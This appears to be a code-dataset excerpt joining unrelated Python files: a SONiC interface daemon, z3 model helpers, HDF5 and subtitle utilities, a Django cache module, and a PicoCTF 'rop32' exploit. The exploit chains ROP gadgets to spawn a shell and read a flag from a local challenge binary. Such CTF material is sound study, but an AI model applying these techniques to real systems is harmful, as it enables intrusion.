sess.set_item(f"{xpath}/admin-status", value)
breakout_parent_dict = {}
for key in self.get_config_db_keys("PORT|Ethernet*"):
ifname = key.split("|")[1]
intf_data = self.sonic_db.get_all(self.sonic_db.CONFIG_DB, key)
logger.debug(f"config db entry: key: {key}, value: {intf_data}")
xpath = f"/goldstone-interfaces:interfaces/interface[name='{ifname}']"
xpath_subif_breakout = f"{xpath}/breakout"
# TODO use the parent leaf to detect if this is a sub-interface or not
# using "_1" is vulnerable to the interface nameing schema change
if not ifname.endswith("_1") and ifname.find("_") != -1:
_ifname = ifname.split("_")
tmp_ifname = _ifname[0] + "_1"
if tmp_ifname in breakout_parent_dict.keys():
breakout_parent_dict[tmp_ifname] = (
breakout_parent_dict[tmp_ifname] + 1
)
else:
breakout_parent_dict[tmp_ifname] = 1
logger.debug(
f"ifname: {ifname}, breakout_parent_dict: {breakout_parent_dict}"
)
sess.set_item(f"{xpath_subif_breakout}/parent", tmp_ifname)
for key in intf_data:
value = _decode(intf_data[key])
key = _decode(key)
if key == "mtu":
sess.set_item(f"{xpath}/goldstone-ip:ipv4/{key}", value)
elif (
key != "index"
and key != "phys-address"
and key != "admin_status"
and key != "alias"
and key != "description"
and key != "breakout"
):
sess.set_item(f"{xpath}/{key}", value)
for key in breakout_parent_dict:
xpath_parent_breakout = (
f"/goldstone-interfaces:interfaces/interface[name='{key}']/breakout"
)
speed = self.sonic_db.get(
self.sonic_db.CONFIG_DB, "PORT|" + key, "speed"
)
logger.debug(f"key: {key}, speed: {speed}")
if speed != None:
sess.set_item(
f"{xpath_parent_breakout}/num-channels",
breakout_parent_dict[key] + 1,
)
sess.set_item(
f"{xpath_parent_breakout}/channel-speed",
speed_to_yang_val(speed),
)
else:
logger.warn(
f"Breakout interface:{key} doesnt has speed attribute in Redis"
)
hash_keys = self.sonic_db.keys(
self.sonic_db.CONFIG_DB, pattern="VLAN|Vlan*"
)
# clear the VLAN operational ds and build it from scratch
try:
v = sess.get_data("/goldstone-vlan:*", no_subs=True)
logger.debug(f"VLAN oper ds before delete: {v}")
# clear the intf operational ds and build it from scratch
sess.delete_item("/goldstone-vlan:vlan")
v = sess.get_data("/goldstone-vlan:*", no_subs=True)
logger.debug(f"VLAN oper ds after delete: {v}")
except Exception as e:
logger.debug(e)
if hash_keys != None:
hash_keys = map(_decode, hash_keys)
for _hash in hash_keys:
name = _hash.split("|")[1]
xpath = f"/goldstone-vlan:vlan/VLAN/VLAN_LIST[name='{name}']"
vlanDATA = self.sonic_db.get_all(self.sonic_db.CONFIG_DB, _hash)
for key in vlanDATA:
logger.debug(f"vlan config: {vlanDATA}")
value = _decode(vlanDATA[key])
key = _decode(key)
if key == "members@":
member_list = value.split(",")
for member in member_list:
sess.set_item(f"{xpath}/members", member)
else:
sess.set_item(f"{xpath}/{key}", value)
hash_keys = self.sonic_db.keys(
self.sonic_db.CONFIG_DB, pattern="VLAN_MEMBER|Vlan*|Ethernet*"
)
if hash_keys != None:
hash_keys = map(_decode, hash_keys)
for _hash in hash_keys:
name, ifname = _hash.split("|")[1:]
xpath = f"/goldstone-vlan:vlan/VLAN_MEMBER/VLAN_MEMBER_LIST[name='{name}'][ifname='{ifname}']"
member_data = self.sonic_db.get_all(self.sonic_db.CONFIG_DB, _hash)
for key in member_data:
value = _decode(member_data[key])
key = _decode(key)
sess.set_item(f"{xpath}/{key}", value)
try:
sess.apply_changes(timeout_ms=5000, wait=True)
except sysrepo.SysrepoTimeOutError as e:
logger.warn(f"update oper ds timeout: {e}")
sess.apply_changes(timeout_ms=5000, wait=True)
def event_handler(self, msg):
try:
key = _decode(msg["channel"])
key = key.replace("__keyspace@0__:", "")
name = key.replace("PORT_TABLE:", "")
oper_status = _decode(
self.sonic_db.get(self.sonic_db.APPL_DB, key, "oper_status")
)
if name in self.notif_if:
curr_oper_status = self.notif_if[name]
else:
curr_oper_status = "unknown"
if curr_oper_status == oper_status:
return
eventname = "goldstone-interfaces:interface-link-state-notify-event"
notif = {
eventname: {
"ifname": name,
"oper-status": oper_status,
}
}
with self.conn.start_session() as sess:
ly_ctx = sess.get_ly_ctx()
n = json.dumps(notif)
logger.info(f"Notification: {n}")
dnode = ly_ctx.parse_data_mem(n, fmt="json", notification=True)
sess.notification_send_ly(dnode)
self.notif_if[name] = oper_status
except Exception as exp:
logger.error(exp)
pass
async def start(self):
logger.debug(
"****************************inside start******************************"
)
self.sonic_db.connect(self.sonic_db.CONFIG_DB)
self.sonic_db.connect(self.sonic_db.APPL_DB)
self.sonic_db.connect(self.sonic_db.COUNTERS_DB)
logger.debug(
"****************************reconciliation******************************"
)
self.sess.switch_datastore("running")
with self.sess.lock("goldstone-interfaces"):
with self.sess.lock("goldstone-vlan"):
# Calling breakout_update_usonic() is mandatory before initial reconcile
# process, as gssouth-sonic will replace the interface names properly during
# init if they have been modified.
breakout_dict = {}
is_updated = await self.breakout_update_usonic(breakout_dict)
if is_updated:
await self.watch_pods()
else:
self.cache_counters()
self.reconcile()
self.update_oper_db()
self.is_usonic_rebooting = False
self.sess.switch_datastore("running")
self.sess.subscribe_module_change(
"goldstone-interfaces",
None,
self.intf_change_cb,
asyncio_register=True,
)
self.sess.subscribe_module_change(
"goldstone-vlan", None, self.vlan_change_cb
)
logger.debug(
"**************************after subscribe module change****************************"
)
self.sess.subscribe_oper_data_request(
"goldstone-interfaces",
"/goldstone-interfaces:interfaces",
self.oper_cb,
oper_merge=True,
)
self.sess.subscribe_rpc_call(
"/goldstone-interfaces:clear_counters",
self.clear_counters,
)
cache = redis.Redis(REDIS_SERVICE_HOST, REDIS_SERVICE_PORT)
pubsub = cache.pubsub()
pubsub.psubscribe(
**{"__keyspace@0__:PORT_TABLE:Ethernet*": self.event_handler}
)
pubsub.run_in_thread(sleep_time=2)
return []
def main():
async def _main():
loop = asyncio.get_event_loop()
stop_event = asyncio.Event()
loop.add_signal_handler(signal.SIGINT, stop_event.set)
loop.add_signal_handler(signal.SIGTERM, stop_event.set)
server = Server()
try:
tasks = await server.start()
tasks.append(stop_event.wait())
done, pending = await asyncio.wait(
tasks, return_when=asyncio.FIRST_COMPLETED
)
logger.debug(f"done: {done}, pending: {pending}")
for task in done:
e = task.exception()
if e:
raise e
finally:
server.stop()
parser = argparse.ArgumentParser()
parser.add_argument("-v", "--verbose", action="store_true")
args = parser.parse_args()
fmt = "%(levelname)s %(module)s %(funcName)s l.%(lineno)d | %(message)s"
if args.verbose:
logging.basicConfig(level=logging.DEBUG, format=fmt)
hpack = logging.getLogger("hpack")
hpack.setLevel(logging.INFO)
k8s = logging.getLogger("kubernetes_asyncio.client.rest")
k8s.setLevel(logging.INFO)
sysrepo.configure_logging(py_logging=True)
else:
logging.basicConfig(level=logging.INFO, format=fmt)
asyncio.run(_main())
if __name__ == "__main__":
main()
| 41.191283 | 114 | 0.492476 |
b648e09391a05b2c9e66d8b92aca8dc6fc2f228e | 1,599 | py | Python | PicoCTF 2019/Binary Exploitation/rop32/exploit.py | p-g-krish/CTF-Writeups | 05ad6a9ecbc19ceb8890f4581dfee36f16d164aa | [
"MIT"
] | 51 | 2018-06-26T09:49:42.000Z | 2019-09-14T00:06:35.000Z | PicoCTF 2019/Binary Exploitation/rop32/exploit.py | p-g-krish/CTF-Writeups | 05ad6a9ecbc19ceb8890f4581dfee36f16d164aa | [
"MIT"
] | 1 | 2018-06-29T18:40:59.000Z | 2018-07-09T20:29:41.000Z | PicoCTF 2019/Binary Exploitation/rop32/exploit.py | p-g-krish/CTF-Writeups | 05ad6a9ecbc19ceb8890f4581dfee36f16d164aa | [
"MIT"
] | 22 | 2019-10-03T14:52:43.000Z | 2022-01-17T08:55:10.000Z | #!/usr/bin/env python2
from pwn import *
from struct import pack
BASE = 0x08048000
pop_esi = BASE+0x00001708
pop_edi = BASE+0x00001adb
pop_ecx_ebx = BASE+0x00026e92
mov_ebx_eax_call_esi = BASE+0x0005b19c
add_edi_ebx_jmp_edi = BASE+0x00045f38
pop_ebx = BASE+0x000001c9
pop_eax = BASE+0x00060e36
int_0x80 = BASE+0x000277a0
mov_edi_ebx_pop_ebx_esi_edi = BASE+0x00057471
add_edi_esi = BASE+0x00086edc
jmp_edi = BASE+0x000237f1
something_got_plt = 0x080DA004
payload = "/bin/sh\x00AAAAAAAABBBBCCCCDDDD"
payload += pack("<I",pop_edi)
payload += pack("<I",something_got_plt)
payload += pack("<I",pop_ebx)
payload += pack("<I",pop_edi)
payload += pack("<I",mov_edi_ebx_pop_ebx_esi_edi)#write pop_edi gadget in .got.plt
payload += pack("<I",0)
payload += pack("<I",0)
payload += pack("<I",0)
payload += pack("<I",pop_esi)
payload += pack("<I",something_got_plt) #esi=&(pop_edi)
payload += pack("<I",pop_ecx_ebx)
payload += pack("<II",0,0)#ecx=0,ebx=0
p1 = (mov_ebx_eax_call_esi) / 2 # contains newline
p2 = (mov_ebx_eax_call_esi) - p1
payload += pack("<I",pop_edi)
payload += pack("<I",p1)
payload += pack("<I",pop_ebx)
payload += pack("<I",p2)
payload += pack("<I",add_edi_ebx_jmp_edi) # -> mov_ebx_eax_call_esi -> pop_edi
p1 = (pop_eax) / 2 # contains newline
p2 = (pop_eax) - p1
payload += pack("<I",pop_edi)
payload += pack("<I",p1)
payload += pack("<I",pop_esi)
payload += pack("<I",p2)
payload += pack("<I",add_edi_esi)
payload += pack("<I",jmp_edi)
payload += pack("<I",0xb) # execve
payload += pack("<I",int_0x80)
p = process("./vuln")
p.sendline(payload)
p.sendline("cat flag.txt")
p.interactive() | 30.75 | 82 | 0.709193 |
60ca7b24fcd10f8ed896ba4dc12cdd0fc8db7848 | 1,841 | py | Python | utils/BM-8-Model-Functions.py | anonymous-authorss/Fairify | f698ae0d283414fb2c08aa4ae237da4f47d01f77 | [
"MIT"
] | null | null | null | utils/BM-8-Model-Functions.py | anonymous-authorss/Fairify | f698ae0d283414fb2c08aa4ae237da4f47d01f77 | [
"MIT"
] | null | null | null | utils/BM-8-Model-Functions.py | anonymous-authorss/Fairify | f698ae0d283414fb2c08aa4ae237da4f47d01f77 | [
"MIT"
] | null | null | null | #!/usr/bin/env python3
# -*- coding: utf-8 -*-
# reinterpret network symbolically using z3 variables.
import sys
from z3 import *
import numpy as np
import pandas as pd
import collections
import time
import datetime
from utils.verif_utils import *
def ground_net(x):
layer_outs = []
for i in range(len(w)):
layer = []
for j in range(len(w[i][0])):
sum = 0
for k in range(len(x)):
sum += x[k] * w[i][k][j]
sum += b[i][j]
layer.append(sum)
layer = np.asarray(layer, dtype=np.float64)
y = layer if i == len(w)-1 else relu(layer)
layer_outs.append(y)
x = y
return y
def layer_net(x, w, b):
layers = []
for i in range(len(w)):
x1 = w[i].T @ x + b[i]
y1 = x1 if i == len(w)-1 else relu(x1)
layers.append(y1)
x = y1
return layers
def net(x, w, b):
# for i in range(len(w)):
# x1 = w[i].T @ x + b[i]
# y1 = x1 if i == len(w)-1 else relu(x1)
# x = y1
x1 = w[0].T @ x + b[0]
y1 = relu(x1)
x2 = w[1].T @ y1 + b[1]
y2 = relu(x2)
x3 = w[2].T @ y2 + b[2]
y3 = relu(x3)
x4 = w[3].T @ y3 + b[3]
y4 = relu(x4)
x5 = w[4].T @ y4 + b[4]
y5 = relu(x5)
x6 = w[5].T @ y5 + b[5]
# y6 = softmax(y1)
return x6
def z3_net(x, w, b):
fl_x = np.array([FP('fl_x%s' % i, Float32()) for i in range(16)])
for i in range(len(x)):
fl_x[i] = ToReal(x[i])
x1 = w[0].T @ fl_x + b[0]
#x1 = w[0].T @ x + b[0]
y1 = z3Relu(x1)
x2 = w[1].T @ y1 + b[1]
y2 = z3Relu(x2)
x3 = w[2].T @ y2 + b[2]
y3 = z3Relu(x3)
x4 = w[3].T @ y3 + b[3]
y4 = z3Relu(x4)
x5 = w[4].T @ y4 + b[4]
y5 = z3Relu(x5)
x6 = w[5].T @ y5 + b[5]
# y6 = softmax(y1)
return x6
| 18.979381 | 71 | 0.468224 |
022985b790c3b3b81f240adb89fd27d63072c635 | 1,687 | py | Python | SubtitleTools.py | icyplayer/AnimeTools | 9159e5899c5263876b652f0e3b83112a4e9b58ce | [
"MIT"
] | null | null | null | SubtitleTools.py | icyplayer/AnimeTools | 9159e5899c5263876b652f0e3b83112a4e9b58ce | [
"MIT"
] | null | null | null | SubtitleTools.py | icyplayer/AnimeTools | 9159e5899c5263876b652f0e3b83112a4e9b58ce | [
"MIT"
] | null | null | null | """
For subtitle zip file unzip and rename to fit video file name,
so as to auto-adde by video player while video file opened.
Works under Python 2.7.10
"""
import os
import sys
import zipfile
#unzip
def unzip(fileName):
zfile = zipfile.ZipFile(fileName,'r')
for filename in zfile.namelist():
data = zfile.read(filename)
with open(filename, 'w+b') as file:
file.write(data)
print('%s unzipped' % fileName)
#unzip files under path, ~/ as default
def unzipFilePath(dir = os.getcwd()):
list = os.listdir(dir)
for fileName in list:
if fileName.split('.uni_sub.')[-1] == 'zip':
unzip(fileName)
def renameFileUnderPath(dir = os.getcwd()):
list = os.listdir(dir)
for fileName in list:
nameList = fileName.split('.')
if nameList[-1] == 'ass':
if nameList[1] == 'uni_gb':
newName = nameList[0] + '.' + nameList[-1]
os.renames(fileName, nameList[0]+'.'+'ass')
print('renamed: %s => %s' % (fileName, newName))
if __name__ == '__main__':
# print('Start unzipping...')
# unzipFilePath()
print('Start renaming...')
renameFileUnderPath()
print('Finished!')
# # ref: http://www.sharejs.com/codes/python/210
# #zip all files under folder
# f = zipfile.ZipFile('archive.zip','w',zipfile.ZIP_DEFLATED)
# startdir = "c:\\mydirectory"
# for dirpath, dirnames, filenames in os.walk(startdir):
# for filename in filenames:
# f.write(os.path.join(dirpath,filename))
# f.close()
#zip
# import zipfile
# f = zipfile.ZipFile('archive.zip','w',zipfile.ZIP_DEFLATED)
# f.write('file_to_add.py')
# f.close()
| 26.777778 | 64 | 0.615886 |
828c3b8b442160aab2ae07be4cd78118134350e5 | 7,976 | py | Python | hdf5_test.py | Morrighan89/Python-In-The-Lab_Project | dadcb6618eb6fcc39bc4812918ca0c56c22b4bd3 | [
"MIT"
] | 1 | 2017-05-03T17:56:02.000Z | 2017-05-03T17:56:02.000Z | hdf5_test.py | Morrighan89/Python-In-The-Lab_Project | dadcb6618eb6fcc39bc4812918ca0c56c22b4bd3 | [
"MIT"
] | null | null | null | hdf5_test.py | Morrighan89/Python-In-The-Lab_Project | dadcb6618eb6fcc39bc4812918ca0c56c22b4bd3 | [
"MIT"
] | null | null | null | import glob, os, sys
import h5py
import numpy as np
import matplotlib.pyplot as plt
"""
Basic script Open a HDF5 file of my simulation and compute the Hysteresis loop, saves data in an opportune file with specific naming pattern
at the end plots the calculated loop.
"""
def calcoloMagnMedia(time,file,Volumes):
data=np.array([])
dataset_Magnet = '/Magnetizzazione%s/Val'%(time)
dataset_Hext = '/Hext%s/Val'%(time)
#print(dataset_Magnet)
datasetM = file[dataset_Magnet]
#print(datasetM.shape, isinstance(datasetM,h5py.Dataset))
#magnetizzazione = np.matrix(datasetM[0:103,:])
magnetizzazione = np.matrix(datasetM[()])
#print(np.shape(magnetizzazione))
#proiez=np.dot(np.dot(magnetizzazione,versore),versoreT)
proiezu = np.dot(magnetizzazione, versoreu)
proiezv = np.dot(magnetizzazione, versorev)
proiezw = np.dot(magnetizzazione, versorew)
#print(proiez,i, "\n")
datasetH = file[dataset_Hext]
#print(datasetH.shape, isinstance(datasetH,h5py.Dataset))
#Hext= datasetH[0:103,0]
Hext= datasetH[(0)]
Hext = np.dot(np.dot(Hext, versoreu), np.reshape((1, 0, 0), (1, 3))) + np.dot(np.dot(Hext, versorev),
np.reshape((0, 1, 0),
(1, 3))) + np.dot(
np.dot(Hext, versorew), np.reshape((0, 0, 1), (1, 3)))
#np.savetxt("uffa",proiezu)
mediau=np.average(proiezu,weights=Volumes)
mediav=np.average(proiezv,weights=Volumes)
mediaw=np.average(proiezw,weights=Volumes)
data=np.append(data, [Hext[0], mediau, Hext[1], mediav, Hext[2], mediaw])
return data
def calcoloMagnMediaDisks(time,file,Volumes,numDisks):
data=np.array([])
dataset_Magnet = '/Magnetizzazione%s/Val'%(time)
dataset_Hext = '/Hext%s/Val'%(time)
#print(dataset_Magnet)
datasetM = file[dataset_Magnet]
#print(datasetM.shape, isinstance(datasetM,h5py.Dataset))
#magnetizzazione = np.matrix(datasetM[0:103,:])
magnetizzazione = np.matrix(datasetM[()])
#print(np.shape(magnetizzazione))
#proiez=np.dot(np.dot(magnetizzazione,versore),versoreT)
proiezu = np.dot(magnetizzazione, versoreu)
proiezv = np.dot(magnetizzazione, versorev)
proiezw = np.dot(magnetizzazione, versorew)
#print(Volumes[9:12], "\n")
datasetH = file[dataset_Hext]
#print(datasetH.shape, isinstance(datasetH,h5py.Dataset))
#Hext= datasetH[0:103,0]
Hext= datasetH[(0)]
Hext = np.dot(np.dot(Hext, versoreu), np.reshape((1, 0, 0), (1, 3))) + np.dot(np.dot(Hext, versorev),
np.reshape((0, 1, 0),
(1, 3))) + np.dot(
np.dot(Hext, versorew), np.reshape((0, 0, 1), (1, 3)))
#np.savetxt("uffa",proiezu)
numElem=int(np.size(magnetizzazione,0)/numDisks)
for i in range(1, numDisks+1):
mediau=np.average(proiezu[(i-1)*numElem : i*numElem-1],weights=Volumes[(i-1)*numElem:i*numElem-1])
mediav=np.average(proiezv[(i-1)*numElem : i*numElem-1],weights=Volumes[(i-1)*numElem:i*numElem-1])
mediaw=np.average(proiezw[(i-1)*numElem : i*numElem-1],weights=Volumes[(i-1)*numElem:i*numElem-1])
data=np.append(data, [Hext[0], mediau, Hext[1], mediav, Hext[2], mediaw])
return data
def calcoloEnergia(time,file,Volumes):
data=np.array([])
dataset_Magnet = '/Magnetizzazione%s/Val'%(time)
dataset_Hext = '/Hext%s/Val'%(time)
dataset_Hms = '/Hms%s/Val'% (time)
#print(dataset_Magnet)
datasetM = file[dataset_Magnet]
data_hms= file[dataset_Hms]
hms=np.matrix(data_hms[()])
data_Hext = file[dataset_Hms]
hext = np.matrix(data_Hext[()])
# magnetizzazione = np.matrix(datasetM[0:103,:])
magnetizzazione = np.matrix(datasetM[()])
enHms=-2*np.pi*1.e-7*np.einsum('ij, ij->i', hms, magnetizzazione)
enHms =np.reshape(enHms, (-1, 1))
enHms= np.average(enHms,weights=Volumes)
enZee=-4*np.pi*1.e-7*np.einsum('ij, ij->i',magnetizzazione, hext)
enZee =np.reshape(enZee, (-1, 1))
enZee= np.average(enZee,weights=Volumes)
#print(proiez,i, "\n")
datasetH = file[dataset_Hext]
data=np.append(data,[time, enHms,enZee])
return data
if __name__ == '__main__':
#mainDir = "W:\\Micro\\Riccardo\\cfr2d3d_3d_random\\2d3d"
mainDir = "S:\\Alessandra\\2d3d\\Thermal"
#mainDir= "W:\\Micro\\2d3d\\SquarePerCfr3D"
#mainDir = "W:\\Micro\\Riccardo\\cfr2d3d_3d_random\\approx_noapprox"
#mainDir = "W:\\Micro\\2d3d\\dot150\\n54"
#mainDir = "W:\\Micro\\FePd\\d250"
filename= "temp150n30c27d3cont_1.h5"
outputfile=filename.split(".", 1)[0]+".dat"
outputHystfile=outputfile.split("_", 1)[0]+"_Hyst_"+outputfile.split("_", 1)[1]
outputEnergyfile=outputfile.split("_", 1)[0]+"_Energy_"+outputfile.split("_", 1)[1]
print(outputfile)
hdf5_file_name = os.path.join(mainDir, filename)
dataset_numTimeSteps ='/Timesteps/TimeSteps#'
dataset_Volumes ='/Volumes'
event_number = 5
versoreu = np.array([[1],[0],[0]])
versorev = np.array([[0], [1], [0]])
versorew = np.array([[0],[0],[1]])
file = h5py.File(hdf5_file_name, 'r') # 'r' means that hdf5 file is open in read-only mode
datasetTime=file[dataset_numTimeSteps]
datasetVol=file[dataset_Volumes]
numTimeSteps= datasetTime[(0)]
print(numTimeSteps)
mediau= np.array([])
mediav= np.array([])
mediaw= np.array([])
Hexternal=np.array([])
outputdata=np.array([])
outputdata2 = np.array([])
outputEner=np.array([])
Volumes=np.array(datasetVol[()])
numDisks=30
# for i in range(1,numTimeSteps):
# #outputdata=np.append(outputdata,calcoloMagnMedia(int(i),file,Volumes))
# #outputEner = np.append(outputEner, calcoloEnergia(int(i), file, Volumes))
# outputdata = np.append(outputdata, calcoloMagnMediaDisks(int(i), file, Volumes,numDisks))
# print(np.shape(outputdata) , "np.shape outputdata")
#
# outputdata = np.reshape(outputdata, (-1, 6*(numDisks)))
# #outputEner = np.reshape(outputEner, (-1, 3))
# #np.savetxt(os.path.join(mainDir, outputHystfile), outputdata, fmt='%26.18e')
# #np.savetxt(os.path.join(mainDir, outputEnergyfile), outputEner, fmt='%26.18e')
# for i in range(1, numDisks+1):
# outputHystfile = outputfile.split("_", 1)[0] + "_Hyst_" + str(i) +"_"+ outputfile.split("_", 1)[1]
# np.savetxt(os.path.join(mainDir, outputHystfile), outputdata[:, (i-1)*6:i*6], fmt='%26.18e')
for i in range(1,numTimeSteps):
outputdata2=np.append(outputdata2,calcoloMagnMedia(int(i),file,Volumes))
#outputEner = np.append(outputEner, calcoloEnergia(int(i), file, Volumes))
#outputdata = np.append(outputdata, calcoloMagnMediaDisks(int(i), file, Volumes,numDisks))
print(np.shape(outputdata2) , "np.shape outputdata")
outputdata2 = np.reshape(outputdata2, (-1, 6))
#outputEner = np.reshape(outputEner, (-1, 3))
#np.savetxt(os.path.join(mainDir, outputHystfile), outputdata, fmt='%26.18e')
#np.savetxt(os.path.join(mainDir, outputEnergyfile), outputEner, fmt='%26.18e')
outputHystfile = outputfile.split("_", 1)[0] + "_Hyst_" + outputfile.split("_", 1)[1]
np.savetxt(os.path.join(mainDir, outputHystfile), outputdata2, fmt='%26.18e')
file.close()
fig = plt.figure()
ax = fig.add_subplot(111)
lb = "u"
ax.plot(outputdata2[1:-1, 0]/1000, outputdata2[1:-1, 1]/1000, label=lb)
lb = "v"
ax.plot(outputdata2[1:-1, 2]/1000, outputdata2[1:-1, 3]/1000, label=lb)
lb = "w"
ax.plot(outputdata2[1:-1, 4]/1000, outputdata2[1:-1, 5]/1000, label=lb)
ax.legend(numpoints=1)
ax.grid(True)
#plt.plot(Hexternal, mediau)
plt.show()
| 41.113402 | 140 | 0.624498 |
df8ed9fef65fcdc561976903b93466525ed08ade | 8,667 | py | Python | base/core/library/cache/__init__.py | B-ROY/TESTGIT | 40221cf254c90d37d21afb981635740aebf11949 | [
"Apache-2.0"
] | 2 | 2017-12-02T13:58:30.000Z | 2018-08-02T17:07:59.000Z | base/core/library/cache/__init__.py | B-ROY/TESTGIT | 40221cf254c90d37d21afb981635740aebf11949 | [
"Apache-2.0"
] | null | null | null | base/core/library/cache/__init__.py | B-ROY/TESTGIT | 40221cf254c90d37d21afb981635740aebf11949 | [
"Apache-2.0"
] | null | null | null | # -*- coding: utf-8 -*-
__author__ = 'zen'
import logging
import time
import functools
import hashlib
import inspect
import pickle
import pylibmc
from django.conf import settings
from base.core.util import dateutils
# print settings.memcache_settings
memcache_settings = settings.memcache_settings
func_cache = pylibmc.Client(
memcache_settings["func_cache"],
binary=True,
behaviors={"tcp_nodelay": True, "ketama": True}
)
page_cache = pylibmc.Client(
memcache_settings["page_cache"],
binary=True,
behaviors={"tcp_nodelay": True, "ketama": True}
)
fragment_cache = pylibmc.Client(
memcache_settings["fragment_cache"],
binary=True,
behaviors={"tcp_nodelay": True, "ketama": True}
)
user_cache = pylibmc.Client(
memcache_settings["user_cache"],
binary=True,
behaviors={"tcp_nodelay": True, "ketama": True}
)
def get_plus_json(key, func, expire_m=None, expire_s=None, is_update=False, set_retry=True, not_valid_check={}):
key_expire_name = "api.expired_at"
raw_content = None
if not is_update:
n = time.time()
content = page_cache.get(key)
try:
u = time.time() - n
if u > 1:
logging.error("get key %s use %s", key, u)
except Exception, e:
pass
if content:
if isinstance(content, dict) and content.has_key(key_expire_name):
if content.get(key_expire_name) > int(time.time()):
#cache not expired
logging.debug("get key from cache:%s" % key)
return [content, ]
else:
#cache expired,need to get new one
#if get new key exception use old one
logging.debug("expired %s" % key)
raw_content = content
def get_and_set():
try:
#get result from origin function
result = func()
if result:
#new version key result
#{
# "api.body" : xxxxx
# "api.expire" : 1363672663
#}
valid = True
if not_valid_check:
if isinstance(result, list):
for r in result:
for k, v in not_valid_check.iteritems():
if r.get(k) == v:
valid = False
break
if valid:
logging.debug("set new version data")
data = {key_expire_name: int(time.time() + expire_m)}
for r in result:
data.update(r)
logging.debug("get data add set key:%s" % key)
page_cache.set(key, data, expire_s)
return [data, ]
except Exception, e:
logging.error(e)
if raw_content:
logging.debug("exception use old key:%s" % key)
if set_retry:
#set 10 minute retry
data = raw_content
data.update({key_expire_name: int(time.time() + settings.cache_expire_15M)})
page_cache.set(key, data, expire_s)
return [raw_content, ]
else:
#must be evctions or old key
logging.error(e)
raise e
#default pool0 one hour after be expired.
expire_m = expire_m or settings.cache_expire_1H
#expire_m = 3 for test
#2h not expire
expire_s = expire_s or expire_m + settings.cache_expire_2H
#key for mutex
key_mutex = '%s_mutex' % key
if page_cache.add(key_mutex, 1, settings.cache_expire_1M):
#only allow one
logging.debug("*mutex: %s" % key_mutex)
try:
raw_content = get_and_set()
finally:
logging.debug("delete mutex key:%s" % key_mutex)
#delate mutex key
page_cache.delete(key_mutex)
else:
#on key expire be mutex go here use old key to return
logging.debug("*mutex locked: %s" % key)
if not raw_content:
#retry to get from func() ,normally not go here ,must be evictions
logging.debug("* evictions: %s" % key)
import timeit
n = timeit.default_timer()
raw_content = get_and_set()
spend = timeit.default_timer() - n
#todo logging.error spend url
logging.error("* evictions: %s %s" % (func.func_closure[0].cell_contents.request.path, spend))
return raw_content
def _encode_cache_key(k):
if isinstance(k, (bool, int, long, float, str)):
return str(k)
elif isinstance(k, unicode):
return k.encode('utf-8')
elif isinstance(k, dict):
import urllib
for x in k.keys():
k[x] = _encode_cache_key(k[x])
return urllib.urlencode(sorted(k.items()), True)
else:
return repr(k)
def function_cache(cache_keys="", prefix='api#phone', suffix='fun', expire_time=60 * 60, is_update_cache='', extkws={}):
u"""
cache_keys:缓存取那些参数当key,key之间用豆号分割,空就是用函数所有参数
prefix:前缀,suffix:后缀
expire_time:缓存时间,defaut time 30'm
is_update_cache="YES" or '' ,是否马上更新缓存,空到expire_time才更新缓存
extkws={},追加缓存参数,同名覆盖缓存参数
is_obd:"YES" or '' ,缓存运营管理
生成ckey的长度len不超过200
"""
def decorator(func):
@functools.wraps(func)
def wrapper(*args, **kwargs):
cache_keys_list = []
if cache_keys:
cache_keys_list = cache_keys.split(',')
arg_names, varargs, varkw, defaults = inspect.getargspec(func)
#defaults
_defargs = dict(zip(arg_names[-len(defaults):], defaults)) if defaults else {}
_args1 = dict(zip(arg_names, args))
_kwds = dict(_defargs, **_args1)
_kwds.update(kwargs)
_kwds.update(extkws)
otheragrs = []
if varargs:
tmp = _args1.values()
otheragrs = [v for v in args if v not in tmp]
if otheragrs:
for i in xrange(0, len(otheragrs)):
_k = "_arg{}".format(i)
_kwds[_k] = otheragrs[i]
if cache_keys_list:
for k, v in _kwds.items():
if k not in cache_keys_list:
_kwds.pop(k, None)
ckey = ""
if _kwds:
ckey = _encode_cache_key(_kwds)
ckey = hashlib.md5(ckey).hexdigest()
ckey = "{}#{}#{}".format(prefix, ckey, suffix)
if len(ckey) > 200:
ckey = ckey[:200]
try:
value = None if is_update_cache.upper() == 'YES' else func_cache.get(ckey)
if value is None:
value = func(*args, **kwargs)
if value:
func_cache.set(ckey, value, expire_time)
return value
except Exception, e:
return func(*args, **kwargs)
wrapper.original_function = func
wrapper.func_name = func.func_name
wrapper.__doc__ = func.__doc__
return wrapper
return decorator
def page_static_cache(timeout=60 * 60 * 1, content_type="text/html", user_cache=True, host_cache=True,key_prefix=True):
"""
page cache
param:
timeout:the deadline of cache default is 1800
"""
def _func(func):
def wrap(request, *a, **kw):
key = request.get_full_path()
try:
key = key.encode("utf-8")
except Exception, e:
key = str(key)
if key_prefix:
key = "%s:%s" % (dateutils.zero_date().strftime('%Y-%m-%d'), key)
if user_cache:
key = "%s:%s" % (key, request.user.id)
if host_cache:
key = "%s:%s" % (key, request.get_host())
logging.debug("form get key:%s" % key)
key = hashlib.md5(key).hexdigest()
response = page_cache.get(key)
if not response or settings.DEBUG:
response = func(request, *a, **kw)
if response:
logging.debug("form set key:%s" % key)
page_cache.set(key, pickle.dumps(response), timeout)
else:
response = pickle.loads(response)
logging.debug("form get key:%s" % key)
return response
return wrap
return _func
| 32.582707 | 120 | 0.527403 |
42af4742cc5e4bfe401ae862524e95f5d15be1d3 | 910 | py | Python | duke-cs671-fall21-coupon-recommendation/outputs/rules/RF/4_features/numtrees_45/rule_38.py | apcarrik/kaggle | 6e2d4db58017323e7ba5510bcc2598e01a4ee7bf | [
"MIT"
] | null | null | null | duke-cs671-fall21-coupon-recommendation/outputs/rules/RF/4_features/numtrees_45/rule_38.py | apcarrik/kaggle | 6e2d4db58017323e7ba5510bcc2598e01a4ee7bf | [
"MIT"
] | null | null | null | duke-cs671-fall21-coupon-recommendation/outputs/rules/RF/4_features/numtrees_45/rule_38.py | apcarrik/kaggle | 6e2d4db58017323e7ba5510bcc2598e01a4ee7bf | [
"MIT"
] | null | null | null | def findDecision(obj): #obj[0]: Coupon, obj[1]: Education, obj[2]: Occupation, obj[3]: Distance
# {"feature": "Coupon", "instances": 23, "metric_value": 0.9877, "depth": 1}
if obj[0]>0:
# {"feature": "Occupation", "instances": 20, "metric_value": 0.9341, "depth": 2}
if obj[2]<=12:
# {"feature": "Distance", "instances": 18, "metric_value": 0.8524, "depth": 3}
if obj[3]>1:
# {"feature": "Education", "instances": 11, "metric_value": 0.9457, "depth": 4}
if obj[1]<=0:
return 'True'
elif obj[1]>0:
return 'False'
else: return 'False'
elif obj[3]<=1:
